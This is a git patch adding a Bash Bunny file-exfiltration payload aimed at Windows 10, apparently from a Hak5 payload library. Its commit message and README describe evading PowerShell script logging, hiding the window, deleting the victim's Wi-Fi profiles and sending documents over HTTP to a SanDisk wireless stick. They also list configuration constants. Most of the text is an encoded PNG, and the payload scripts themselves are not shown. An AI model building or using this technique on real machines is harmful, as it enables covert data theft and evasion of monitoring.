From 5d4367787f231680133e11cc7000ea4c67ffc92e Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Tue, 21 Dec 2021 18:24:09 -0500
Subject: [PATCH] SanDisk Wireless Stick Exfiltration (#445)

Uses the "SanDisk Wireless Stick" for files exfiltration.
1) Avoids "PowerShell Script Block Logging".
2) Hide "PowerShell" window.
3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
6) Exfiltration of the files via the HTTP channel.
---
.../README.md | 40 +++++
.../assets/SanDisk-Configuration.png | Bin 0 -> 22271 bytes
.../payload.ps1 | 159 ++++++++++++++++++
.../payload.txt | 74 ++++++++
4 files changed, 273 insertions(+)
create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md
create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/assets/SanDisk-Configuration.png
create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1
create mode 100644 payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt

diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md
new file mode 100644
index 00000000..53d5b486
--- /dev/null
+++ b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md
@@ -0,0 +1,40 @@
+# Files Exfiltration with "SanDisk Wireless Stick"
+
+- Title: "SanDisk Wireless Stick" Exfiltration
+- Author: TW-D
+- Version: 1.0
+- Target: Microsoft Windows 10
+- Category: Exfiltration
+
+## Description
+
+Uses the "SanDisk Wireless Stick" for files exfiltration.
+1) Avoids "PowerShell Script Block Logging".
+2) Hide "PowerShell" window.
+3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
+4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
+5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
+6) Exfiltration of the files via the HTTP channel.
+
+## Configuration
+
+In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
+
+![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
+
+From "payload.txt" change the values of the following constants :
+```bash
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+readonly SANDISK_SSID="HAK5-EXFIL"
+readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
+readonly SANDISK_LOOT="loots"
+readonly USER_DIRECTORY="~\\"
+readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
+
+```
+
+## Link
+[SanDisk Vendor](https://www.sandisk.com/goto/connect)
diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/assets/SanDisk-Configuration.png b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/assets/SanDisk-Configuration.png new file mode 100644 index 0000000000000000000000000000000000000000..0258e4dda576ce090526aaaeb3bc131275f4a98a GIT binary patch literal 22271 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 
